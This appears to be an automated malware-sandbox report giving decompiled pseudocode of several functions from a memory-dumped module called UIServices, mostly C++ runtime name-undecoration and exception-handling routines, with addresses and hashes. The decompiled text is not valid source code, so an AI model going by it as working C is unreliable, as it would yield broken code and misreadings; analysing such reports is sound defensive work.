                                                    				E00007FFC7FFC23566CF4("void", __rcx,  &_v88);
                                                    				goto 0x2356d08f;
                                                    				if (_t43 != 0x3f) goto 0x2356d07a;
                                                    				E00007FFC7FFC2356C270(__rcx,  &_v72,  &_v88, __rsi, __r8, __r10, __r11, __r14);
                                                    				if (( *0x23574370 & 0x00004000) == 0) goto 0x2356d031;
                                                    				_t87 =  *0x23574378; // 0x0
                                                    				if (_t87 == 0) goto 0x2356d031;
                                                    				_t70 = _v72;
                                                    				if (_t70 == 0) goto 0x2356d003;
                                                    				 *0x235701a0();
                                                    				 *((char*)( *((intOrPtr*)( *_t70 + 0x18)))) = 0;
                                                    				_t88 =  *0x23574378; // 0x0
                                                    				goto 0x2356d007;
                                                    				_v40 = 0;
                                                    				_t35 = atol(??);
                                                    				 *0x235701a0();
                                                    				if (_t88 == 0) goto 0x2356d031;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC235669EC(_t65, _t88);
                                                    				goto 0x2356d08f;
                                                    				_v80 = 0x13;
                                                    				_v88 = "`template-parameter";
                                                    				asm("movaps xmm0, [ebp-0x50]");
                                                    				asm("movdqa [ebp-0x50], xmm0");
                                                    				E00007FFC7FFC23566CF4("`template-parameter",  &_v56,  &_v88);
                                                    				E00007FFC7FFC23566F74("`template-parameter",  &_v88,  &_v72);
                                                    				r8b = 0x27;
                                                    				E00007FFC7FFC23566FA0( &_v88, _t65);
                                                    				goto 0x2356d08f;
                                                    				_v88 = _v88 & 0x00000000;
                                                    				_v80 = _v80 & 0x00000000;
                                                    				E00007FFC7FFC2356B428(_t45, __edi, "`template-parameter", _t65, _t65,  &_v88, _t88, __rsi,  &_v72, __r14);
                                                    				return E00007FFC7FFC2356F5B0(_t35, _t65, _v24 ^ _t92 - 0x00000070,  &_v88);
                                                    			}






















                                                    0x7ffc2356cf48
                                                    0x7ffc2356cf48
                                                    0x7ffc2356cf4d
                                                    0x7ffc2356cf5a
                                                    0x7ffc2356cf64
                                                    0x7ffc2356cf68
                                                    0x7ffc2356cf6f
                                                    0x7ffc2356cf72
                                                    0x7ffc2356cf77
                                                    0x7ffc2356cf7c
                                                    0x7ffc2356cf83
                                                    0x7ffc2356cf98
                                                    0x7ffc2356cf9c
                                                    0x7ffc2356cfa0
                                                    0x7ffc2356cfa5
                                                    0x7ffc2356cfaa
                                                    0x7ffc2356cfb2
                                                    0x7ffc2356cfbc
                                                    0x7ffc2356cfcb
                                                    0x7ffc2356cfcd
                                                    0x7ffc2356cfd7
                                                    0x7ffc2356cfd9
                                                    0x7ffc2356cfe0
                                                    0x7ffc2356cff1
                                                    0x7ffc2356cff7
                                                    0x7ffc2356cffa
                                                    0x7ffc2356d001
                                                    0x7ffc2356d003
                                                    0x7ffc2356d00b
                                                    0x7ffc2356d016
                                                    0x7ffc2356d01f
                                                    0x7ffc2356d021
                                                    0x7ffc2356d02a
                                                    0x7ffc2356d02f
                                                    0x7ffc2356d031
                                                    0x7ffc2356d03f
                                                    0x7ffc2356d047
                                                    0x7ffc2356d04f
                                                    0x7ffc2356d054
                                                    0x7ffc2356d064
                                                    0x7ffc2356d069
                                                    0x7ffc2356d073
                                                    0x7ffc2356d078
                                                    0x7ffc2356d07a
                                                    0x7ffc2356d083
                                                    0x7ffc2356d08a
                                                    0x7ffc2356d0af

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: NameName::atol
                                                    • String ID: `template-parameter$void
                                                    • API String ID: 2130343216-4057429177
                                                    • Opcode ID: 7b16f8b45c34293ab0306f2659fb29d8749a9551dc3ca80b3c464b0063ee43ae
                                                    • Instruction ID: 8a96e5059b0e450f589ad78d5536d26e63fd9d06f9238a24d5caa6cb83a4dd5d
                                                    • Opcode Fuzzy Hash: 7b16f8b45c34293ab0306f2659fb29d8749a9551dc3ca80b3c464b0063ee43ae
                                                    • Instruction Fuzzy Hash: 35414A62F08B6A88FB00CBA1DC552BC23B1FB48798F940076CE4D2BB59DF789546C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 63%
                                                    			E00007FFC7FFC23568334(long long __rbx, long long* __rcx, long long __rdx, void* __rsi, void* __r8, long long _a8) {
                                                    				char _v24;
                                                    				intOrPtr _v32;
                                                    				char _v40;
                                                    				intOrPtr _v48;
                                                    				void* _v56;
                                                    				void* __rbp;
                                                    				unsigned int _t28;
                                                    				unsigned int _t33;
                                                    				intOrPtr _t37;
                                                    				char* _t48;
                                                    				char* _t49;
                                                    				intOrPtr* _t52;
                                                    				long long _t54;
                                                    				long long* _t62;
                                                    				long long _t68;
                                                    				void* _t74;
                                                    
                                                    				_t68 = __rdx;
                                                    				_a8 = __rbx;
                                                    				_t48 =  *0x23574360; // 0x0
                                                    				_t62 = __rcx;
                                                    				if ( *_t48 == 0x58) goto 0x23568454;
                                                    				if ( *_t48 == 0x5a) goto 0x23568417;
                                                    				E00007FFC7FFC235681A0(__rcx,  &_v56, __rsi, _t74, __r8);
                                                    				_t37 = _v48;
                                                    				if (_t37 != 0) goto 0x2356840b;
                                                    				_t49 =  *0x23574360; // 0x0
                                                    				if ( *_t49 == 0) goto 0x2356840b;
                                                    				if ( *_t49 == 0x40) goto 0x23568401;
                                                    				if ( *_t49 == 0x5a) goto 0x2356839b;
                                                    				 *((intOrPtr*)(_t62 + 8)) = 0;
                                                    				 *((char*)(_t62 + 8)) = 2;
                                                    				 *_t62 = _t68;
                                                    				goto 0x23568482;
                                                    				 *0x23574360 = _t49 + 1;
                                                    				_t28 =  *0x23574370; // 0x0
                                                    				if (( !(_t28 >> 0x12) & 0x00000001) == 0) goto 0x235683c8;
                                                    				_v32 = 4;
                                                    				goto 0x235683d6;
                                                    				_t52 = ",<ellipsis>";
                                                    				_v32 = 0xb;
                                                    				_v40 = _t52;
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23566F48( &_v56,  &_v24,  &_v40);
                                                    				 *_t62 =  *_t52;
                                                    				 *((intOrPtr*)(_t62 + 8)) =  *((intOrPtr*)(_t52 + 8));
                                                    				goto 0x23568482;
                                                    				 *0x23574360 = _t52 + 1;
                                                    				_t54 = _v56;
                                                    				 *_t62 = _t54;
                                                    				 *((intOrPtr*)(_t62 + 8)) = _t37;
                                                    				goto 0x23568482;
                                                    				 *0x23574360 = _t54 + 1;
                                                    				_t33 =  *0x23574370; // 0x0
                                                    				if (( !(_t33 >> 0x12) & 0x00000001) == 0) goto 0x23568444;
                                                    				_v32 = 3;
                                                    				goto 0x23568470;
                                                    				_v32 = 0xa;
                                                    				goto 0x23568470;
                                                    				_v32 = 4;
                                                    				 *0x23574360 = "<ellipsis>" + 1;
                                                    				_v40 = "void";
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				return E00007FFC7FFC23566CF4("void",  *_t52,  &_v40);
                                                    			}



















                                                    0x7ffc23568334
                                                    0x7ffc23568334
                                                    0x7ffc23568341
                                                    0x7ffc23568348
                                                    0x7ffc2356834e
                                                    0x7ffc23568357
                                                    0x7ffc23568361
                                                    0x7ffc23568366
                                                    0x7ffc2356836d
                                                    0x7ffc23568373
                                                    0x7ffc2356837c
                                                    0x7ffc23568385
                                                    0x7ffc2356838a
                                                    0x7ffc2356838c
                                                    0x7ffc2356838f
                                                    0x7ffc23568393
                                                    0x7ffc23568396
                                                    0x7ffc235683a2
                                                    0x7ffc235683a9
                                                    0x7ffc235683b6
                                                    0x7ffc235683bf
                                                    0x7ffc235683c6
                                                    0x7ffc235683c8
                                                    0x7ffc235683cf
                                                    0x7ffc235683d6
                                                    0x7ffc235683de
                                                    0x7ffc235683e6
                                                    0x7ffc235683eb
                                                    0x7ffc235683f3
                                                    0x7ffc235683f9
                                                    0x7ffc235683fc
                                                    0x7ffc23568404
                                                    0x7ffc2356840b
                                                    0x7ffc2356840f
                                                    0x7ffc23568412
                                                    0x7ffc23568415
                                                    0x7ffc2356841e
                                                    0x7ffc23568425
                                                    0x7ffc23568432
                                                    0x7ffc2356843b
                                                    0x7ffc23568442
                                                    0x7ffc2356844b
                                                    0x7ffc23568452
                                                    0x7ffc23568457
                                                    0x7ffc2356845e
                                                    0x7ffc23568470
                                                    0x7ffc23568474
                                                    0x7ffc23568478
                                                    0x7ffc2356848f

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                    • API String ID: 2943138195-2211150622
                                                    • Opcode ID: b269d42368dc05fb67aa32e0fdf2e426be4c8343d2fb3b752ccc1771c97a5ec6
                                                    • Instruction ID: 75b0396d418b6999177ef11cdc817e008cc9210e9d719ad1b6886777c00784ca
                                                    • Opcode Fuzzy Hash: b269d42368dc05fb67aa32e0fdf2e426be4c8343d2fb3b752ccc1771c97a5ec6
                                                    • Instruction Fuzzy Hash: B04114B2F18B6A89FB11CF24EC442A837A4FB48708F9441B1DA4D26758DF3CA545CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 69%
                                                    			E00007FFC7FFC23569F24(void* __edx, void* __edi, long long __rbx, long long __rcx, void* __rdi, void* __rsi, long long _a8) {
                                                    				char _v24;
                                                    				intOrPtr _v32;
                                                    				void* _v40;
                                                    				intOrPtr _v48;
                                                    				long long _v56;
                                                    				intOrPtr _t25;
                                                    				intOrPtr _t32;
                                                    				intOrPtr _t34;
                                                    				intOrPtr* _t47;
                                                    				intOrPtr* _t48;
                                                    				long long _t49;
                                                    				long long* _t55;
                                                    				char* _t58;
                                                    				long long _t60;
                                                    
                                                    				_a8 = __rbx;
                                                    				_t47 =  *0x23574360; // 0x0
                                                    				_t55 = __rcx;
                                                    				_v56 = __rcx;
                                                    				_v48 = 0;
                                                    				if ( *_t47 == 0) goto 0x2356a02f;
                                                    				_t25 =  *_t47;
                                                    				if (_t25 - 0x30 < 0) goto 0x2356a023;
                                                    				if (_t25 - 0x31 <= 0) goto 0x23569f97;
                                                    				if (_t25 - 0x33 <= 0) goto 0x23569f88;
                                                    				if (_t25 == 0x34) goto 0x23569fad;
                                                    				if (_t25 == 0x35) goto 0x23569f79;
                                                    				if (_t25 - 0x36 - 1 > 0) goto 0x2356a023;
                                                    				goto 0x23569f9e;
                                                    				r8d = 4;
                                                    				goto 0x23569fa4;
                                                    				r8d = 6;
                                                    				goto 0x23569fa4;
                                                    				r8d = 5;
                                                    				_t58 =  &_v56;
                                                    				E00007FFC7FFC23566B04(_t47, __rcx, _t58, "char ", __rdi, __rsi);
                                                    				_t48 =  *0x23574360; // 0x0
                                                    				_t34 =  *_t48;
                                                    				 *0x23574360 =  *0x23574360 + 1;
                                                    				if ((_t58 - 0x00000031 & 0x000000f9) != 0) goto 0x23569fc9;
                                                    				if (_t34 != 0x37) goto 0x23569fce;
                                                    				if (_t34 != 0x37) goto 0x2356a014;
                                                    				_v32 = 9;
                                                    				_t49 = "unsigned ";
                                                    				_v40 = _t49;
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23566CF4(_t49,  &_v24,  &_v40);
                                                    				_t60 = _t49;
                                                    				E00007FFC7FFC23566F74(_t60,  &_v40,  &_v56);
                                                    				_v56 = _v40;
                                                    				_v48 = _v32;
                                                    				 *_t55 = _v56;
                                                    				_t32 = _v48;
                                                    				 *((intOrPtr*)(_t55 + 8)) = _t32;
                                                    				goto 0x2356a03c;
                                                    				 *((intOrPtr*)(_t55 + 8)) = _t34;
                                                    				 *((char*)(_t55 + 8)) = 2;
                                                    				 *_t55 = _t60;
                                                    				goto 0x2356a03c;
                                                    				 *((intOrPtr*)(_t55 + 8)) = _t34;
                                                    				 *_t55 = 0x23571ac0;
                                                    				return _t32;
                                                    			}

















                                                    0x7ffc23569f24
                                                    0x7ffc23569f31
                                                    0x7ffc23569f38
                                                    0x7ffc23569f3d
                                                    0x7ffc23569f41
                                                    0x7ffc23569f46
                                                    0x7ffc23569f4c
                                                    0x7ffc23569f50
                                                    0x7ffc23569f58
                                                    0x7ffc23569f5c
                                                    0x7ffc23569f60
                                                    0x7ffc23569f64
                                                    0x7ffc23569f6a
                                                    0x7ffc23569f77
                                                    0x7ffc23569f79
                                                    0x7ffc23569f86
                                                    0x7ffc23569f88
                                                    0x7ffc23569f95
                                                    0x7ffc23569f9e
                                                    0x7ffc23569fa4
                                                    0x7ffc23569fa8
                                                    0x7ffc23569fad
                                                    0x7ffc23569fb4
                                                    0x7ffc23569fb6
                                                    0x7ffc23569fc2
                                                    0x7ffc23569fc7
                                                    0x7ffc23569fcc
                                                    0x7ffc23569fce
                                                    0x7ffc23569fd5
                                                    0x7ffc23569fdc
                                                    0x7ffc23569fe4
                                                    0x7ffc23569fec
                                                    0x7ffc23569ff1
                                                    0x7ffc23569ffa
                                                    0x7ffc2356a001
                                                    0x7ffc2356a00a
                                                    0x7ffc2356a011
                                                    0x7ffc2356a018
                                                    0x7ffc2356a01b
                                                    0x7ffc2356a01e
                                                    0x7ffc2356a021
                                                    0x7ffc2356a023
                                                    0x7ffc2356a026
                                                    0x7ffc2356a02a
                                                    0x7ffc2356a02d
                                                    0x7ffc2356a036
                                                    0x7ffc2356a039
                                                    0x7ffc2356a049

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: char $int $long $short $unsigned
                                                    • API String ID: 2943138195-3894466517
                                                    • Opcode ID: bb3df1c13bcd3c05a540f85c8de59aa84bc71187771de2afaadad0cec2c16253
                                                    • Instruction ID: 6a010a05c19385d8cf08e07512965e8a87d0e1511da0d47eec9272c21d9394ca
                                                    • Opcode Fuzzy Hash: bb3df1c13bcd3c05a540f85c8de59aa84bc71187771de2afaadad0cec2c16253
                                                    • Instruction Fuzzy Hash: 7F315A72F18B6A88EB25CF64EC402BC77B4EB08748F844075DA4C66759DF28A585CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 16%
                                                    			E00007FFC7FFC23566070(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi) {
                                                    				void* _t28;
                                                    				void* _t54;
                                                    				long long _t61;
                                                    				void* _t64;
                                                    				void* _t69;
                                                    				void* _t71;
                                                    				void* _t74;
                                                    				int _t77;
                                                    				void* _t80;
                                                    
                                                    				_t69 = _t64;
                                                    				 *((long long*)(_t69 + 8)) = __rbx;
                                                    				 *((long long*)(_t69 + 0x10)) = _t61;
                                                    				 *((long long*)(_t69 + 0x18)) = __rsi;
                                                    				if ( *__rcx != 0) goto 0x2356616d;
                                                    				 *((short*)(_t64 - 0x40 + 0x28)) = 0x2800;
                                                    				r8d = 0;
                                                    				 *((long long*)(_t69 - 0x48)) = 0x7ffc23565fc0;
                                                    				E00007FFC7FFC2356DF30(_t80);
                                                    				if (0x7ffc23565fc0 == 0) goto 0x23566161;
                                                    				if ( *((intOrPtr*)(0x7ffc23565fc0)) != sil) goto 0x235660da;
                                                    				if (0 == 0) goto 0x23566100;
                                                    				_t28 =  *((char*)(0x7ffc23565fbf)) - 0x20;
                                                    				if (_t28 != 0) goto 0x23566100;
                                                    				 *((intOrPtr*)(0x7ffc23565fbf)) = sil;
                                                    				if (_t28 != 0) goto 0x235660ef;
                                                    				malloc(_t77);
                                                    				if (0xffffffffffffffff == 0) goto 0x23566158;
                                                    				asm("xorps xmm0, xmm0");
                                                    				asm("movaps [esp+0x30], xmm0");
                                                    				asm("movdqa [eax], xmm0");
                                                    				__imp__strcpy_s(_t54);
                                                    				asm("lock dec ebp");
                                                    				if (0 == 0) goto 0x23566146;
                                                    				goto 0x23566158;
                                                    				__imp__InterlockedPushEntrySList();
                                                    				free(_t74);
                                                    				free(_t71);
                                                    				return 0;
                                                    			}












                                                    0x7ffc23566070
                                                    0x7ffc23566073
                                                    0x7ffc23566077
                                                    0x7ffc2356607b
                                                    0x7ffc2356609a
                                                    0x7ffc235660a9
                                                    0x7ffc235660bc
                                                    0x7ffc235660c1
                                                    0x7ffc235660c5
                                                    0x7ffc235660d0
                                                    0x7ffc235660e1
                                                    0x7ffc235660e6
                                                    0x7ffc235660ef
                                                    0x7ffc235660f2
                                                    0x7ffc235660f4
                                                    0x7ffc235660fe
                                                    0x7ffc23566108
                                                    0x7ffc23566114
                                                    0x7ffc23566116
                                                    0x7ffc23566120
                                                    0x7ffc23566128
                                                    0x7ffc23566132
                                                    0x7ffc2356613a
                                                    0x7ffc2356613f
                                                    0x7ffc23566144
                                                    0x7ffc2356614f
                                                    0x7ffc2356615b
                                                    0x7ffc23566164
                                                    0x7ffc2356618a

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000027.00000002.345809709.00007FFC23561000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFC23560000, based on PE: true
                                                    • Associated: 00000027.00000002.345802537.00007FFC23560000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345839209.00007FFC23570000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345852128.00007FFC23574000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345858884.00007FFC23575000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000027.00000002.345905892.00007FFC23577000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_39_2_7ffc23560000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                    • String ID:
                                                    • API String ID: 3741236498-0
                                                    • Opcode ID: 0f2d48bb16129a0a8e53847f6d1a3a85f1b8f07e82e9465fd64f3ead8f082cbd
                                                    • Instruction ID: b4fe3f710abc7b6c12e7dd0b9106ad9f3510b702d7c73048d80c1323e9e39ecb
                                                    • Opcode Fuzzy Hash: 0f2d48bb16129a0a8e53847f6d1a3a85f1b8f07e82e9465fd64f3ead8f082cbd
                                                    • Instruction Fuzzy Hash: 7331D322F19BAA91EA11CF26AC0846963E4FF08FE4B954671DE2D13381EE3DD442C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E00007FFC7FFC23563648(void* __edx, intOrPtr* __rcx, void* __rdx, long long __r8, void* __r9) {
                                                    				void* __rbx;
                                                    				void* __rdi;
                                                    				void* __rsi;
                                                    				void* _t94;
                                                    				intOrPtr _t95;
                                                    				intOrPtr _t125;
                                                    				void* _t136;
                                                    				intOrPtr _t137;
                                                    				signed long long _t143;
                                                    				long long _t145;
                                                    				long long _t150;
                                                    				void* _t151;
                                                    				intOrPtr* _t171;
                                                    				long long _t182;
                                                    				long long _t183;
                                                    				intOrPtr* _t184;
                                                    				void* _t185;
                                                    				intOrPtr* _t186;
                                                    				intOrPtr* _t187;
                                                    				void* _t188;
                                                    				signed long long _t189;
                                                    				intOrPtr _t197;
                                                    				void* _t204;
                                                    				long long _t205;
                                                    
                                                    				_t187 = _t188 - 0x38;
                                                    				_t189 = _t188 - 0x138;
                                                    				_t143 =  *0x23574038; // 0x61e4d8aad2e0
                                                    				 *(_t187 + 0x28) = _t143 ^ _t189;
                                                    				_t185 = __r9;
                                                    				_t145 =  *((intOrPtr*)(_t187 + 0xb8));
                                                    				_t204 = __rdx;
                                                    				_t205 =  *((intOrPtr*)(_t187 + 0xa0));
                                                    				_t186 = __rcx;
                                                    				 *((long long*)(_t189 + 0x70)) = _t145;
                                                    				 *((long long*)(_t189 + 0x78)) = __r8;
                                                    				if ( *__rcx == 0x80000003) goto 0x23563911;
                                                    				E00007FFC7FFC235664B0(_t145);
                                                    				r12d =  *((intOrPtr*)(_t187 + 0xb0));
                                                    				r15d =  *((intOrPtr*)(_t187 + 0xa8));
                                                    				if ( *((long long*)(_t145 + 0x10)) == 0) goto 0x23563710;
                                                    				__imp__EncodePointer();
                                                    				_t160 = _t145;
                                                    				E00007FFC7FFC235664B0(_t145);
                                                    				if ( *((intOrPtr*)(_t145 + 0x10)) == _t145) goto 0x23563710;
                                                    				if ( *__rcx == 0xe0434f4d) goto 0x23563710;
                                                    				if ( *__rcx == 0xe0434352) goto 0x23563710;
                                                    				 *((intOrPtr*)(_t189 + 0x38)) = r15d;
                                                    				 *(_t189 + 0x30) =  *((intOrPtr*)(_t189 + 0x70));
                                                    				 *((intOrPtr*)(_t189 + 0x28)) = r12d;
                                                    				 *((long long*)(_t189 + 0x20)) = _t205;
                                                    				if (E00007FFC7FFC2356E5A0(__rcx, __rdx,  *((intOrPtr*)(_t189 + 0x78)), __r9) != 0) goto 0x23563911;
                                                    				E00007FFC7FFC235640EC(_t187, _t205,  *((intOrPtr*)(__r9 + 8)));
                                                    				if ( *_t187 <= 0) goto 0x23563931;
                                                    				 *((intOrPtr*)(_t189 + 0x28)) = r12d;
                                                    				 *((long long*)(_t189 + 0x20)) = _t205;
                                                    				r8d = r15d;
                                                    				_t94 = E00007FFC7FFC2356EA68(_t145, _t187 - 0x70, _t187, _t185, __rcx);
                                                    				asm("movups xmm0, [ebp-0x70]");
                                                    				asm("movdqu [ebp-0x80], xmm0");
                                                    				asm("psrldq xmm0, 0x8");
                                                    				asm("movd eax, xmm0");
                                                    				if (_t94 -  *((intOrPtr*)(_t187 - 0x58)) >= 0) goto 0x23563911;
                                                    				_t95 =  *((intOrPtr*)(_t187 - 0x78));
                                                    				 *((long long*)(_t189 + 0x68)) =  *((intOrPtr*)(_t187 - 0x70));
                                                    				 *((intOrPtr*)(_t189 + 0x60)) = _t95;
                                                    				asm("inc ecx");
                                                    				asm("dec ax");
                                                    				asm("movups [ebp-0x80], xmm0");
                                                    				if (_t95 - r15d > 0) goto 0x23563877;
                                                    				_t136 = r15d - _t95;
                                                    				if (_t136 > 0) goto 0x23563877;
                                                    				r9d =  *((intOrPtr*)( *((intOrPtr*)(_t185 + 0x10))));
                                                    				E00007FFC7FFC23564070( *((intOrPtr*)(_t185 + 0x10)), _t187 - 0x50, _t187 - 0x80,  *((intOrPtr*)(_t185 + 8)));
                                                    				 *((long long*)(_t187 - 0x48)) =  *((intOrPtr*)(_t187 - 0x40));
                                                    				E00007FFC7FFC23564700( *((intOrPtr*)(_t187 - 0x40)), _t187 - 0x50);
                                                    				_t150 =  *((intOrPtr*)(_t187 - 0x40));
                                                    				 *((long long*)(_t187 - 0x48)) = _t150;
                                                    				E00007FFC7FFC23564700(_t150, _t187 - 0x50);
                                                    				if (_t136 == 0) goto 0x235637ee;
                                                    				E00007FFC7FFC23564700(_t150, _t187 - 0x50);
                                                    				if (_t136 != 0) goto 0x235637df;
                                                    				_t137 =  *((intOrPtr*)(_t187 - 0x30));
                                                    				if (_t137 == 0) goto 0x2356381c;
                                                    				E00007FFC7FFC2356F044(_t150);
                                                    				_t151 = _t150 +  *((intOrPtr*)(_t187 - 0x30));
                                                    				if (_t137 == 0) goto 0x2356381c;
                                                    				if (__edx == 0) goto 0x23563814;
                                                    				E00007FFC7FFC2356F044(_t151);
                                                    				goto 0x23563816;
                                                    				if ( *((char*)(_t151 +  *((intOrPtr*)(_t187 - 0x30)) + 0x10)) != 0) goto 0x2356386b;
                                                    				if (( *(_t187 - 0x34) & 0x00000040) != 0) goto 0x2356386b;
                                                    				 *((char*)(_t189 + 0x58)) = 0;
                                                    				_t171 = _t186;
                                                    				 *((char*)(_t189 + 0x50)) = 1;
                                                    				 *((long long*)(_t189 + 0x48)) =  *((intOrPtr*)(_t189 + 0x70));
                                                    				 *((intOrPtr*)(_t189 + 0x40)) = r12d;
                                                    				 *((long long*)(_t189 + 0x38)) = _t187 - 0x80;
                                                    				 *(_t189 + 0x30) =  *(_t189 + 0x30) & 0x00000000;
                                                    				 *((long long*)(_t189 + 0x28)) = _t187 - 0x38;
                                                    				 *((long long*)(_t189 + 0x20)) = _t205;
                                                    				E00007FFC7FFC23562970(0, _t160 - 1, _t171, _t204,  *((intOrPtr*)(_t189 + 0x78)), _t185);
                                                    				_t197 =  *((intOrPtr*)(_t189 + 0x68));
                                                    				_t182 =  *((intOrPtr*)(_t197 + 8)) -  *((char*)(_t171 + 0x7ffc23570410));
                                                    				 *((long long*)(_t197 + 8)) = _t182;
                                                    				 *(_t197 + 0x18) =  *(_t182 - 4) >>  *(_t171 + 0x7ffc23570420);
                                                    				_t183 = _t182 -  *((char*)(_t171 + 0x7ffc23570410));
                                                    				 *((long long*)(_t197 + 8)) = _t183;
                                                    				 *(_t197 + 0x1c) =  *(_t183 - 4) >>  *(_t171 + 0x7ffc23570420);
                                                    				_t184 = _t183 -  *((char*)(_t171 + 0x7ffc23570410));
                                                    				 *(_t197 + 0x20) =  *(_t184 - 4) >>  *(_t171 + 0x7ffc23570420);
                                                    				 *((long long*)(_t197 + 8)) = _t184;
                                                    				 *((intOrPtr*)(_t197 + 0x24)) =  *_t184;
                                                    				_t125 =  *((intOrPtr*)(_t189 + 0x60)) + 1;
                                                    				 *((long long*)(_t197 + 8)) = _t184 + 4;
                                                    				 *((intOrPtr*)(_t189 + 0x60)) = _t125;
                                                    				if (_t125 -  *((intOrPtr*)(_t187 - 0x58)) < 0) goto 0x23563779;
                                                    				return E00007FFC7FFC2356F5B0(_t125, _t184 + 4,  *(_t187 + 0x28) ^ _t189, _t184);
                                                    			}



























                                                    0x7ffc23563655
                                                    0x7ffc2356365a
                                                    0x7ffc23563661
                                                    0x7ffc2356366b
                                                    0x7ffc23563675
                                                    0x7ffc23563678
                                                    0x7ffc2356367f
                                                    0x7ffc23563682
                                                    0x7ffc23563689
                                                    0x7ffc2356368c
                                                    0x7ffc23563691
                                                    0x7ffc23563696
                                                    0x7ffc2356369c
                                                    0x7ffc235636a1
                                                    0x7ffc235636a8
                                                    0x7ffc235636b4
                                                    0x7ffc235636b8
                                                    0x7ffc235636be
                                                    0x7ffc235636c1
                                                    0x7ffc235636ca
                                                    0x7ffc235636d2
                                                    0x7ffc235636da
                                                    0x7ffc235636ec
                                                    0x7ffc235636f4
                                                    0x7ffc235636f9
                                                    0x7ffc235636fe
                                                    0x7ffc2356370a
                                                    0x7ffc2356371b
                                                    0x7ffc23563724
                                                    0x7ffc2356372a
                                                    0x7ffc23563736
                                                    0x7ffc2356373b
                                                    0x7ffc23563742
                                                    0x7ffc23563747
                                                    0x7ffc2356374b
                                                    0x7ffc23563750
                                                    0x7ffc23563755
                                                    0x7ffc2356375c
                                                    0x7ffc2356376d
                                                    0x7ffc23563770
                                                    0x7ffc23563775
                                                    0x7ffc23563779
                                                    0x7ffc2356377e
                                                    0x7ffc23563783
                                                    0x7ffc2356378a
                                                    0x7ffc23563794
                                                    0x7ffc23563797
                                                    0x7ffc235637ad
                                                    0x7ffc235637b0
                                                    0x7ffc235637bd
                                                    0x7ffc235637c1
                                                    0x7ffc235637c6
                                                    0x7ffc235637d1
                                                    0x7ffc235637d5
                                                    0x7ffc235637dd
                                                    0x7ffc235637e3
                                                    0x7ffc235637ec
                                                    0x7ffc235637ee
                                                    0x7ffc235637f2
                                                    0x7ffc235637f4
                                                    0x7ffc235637fd
                                                    0x7ffc23563800
                                                    0x7ffc23563804
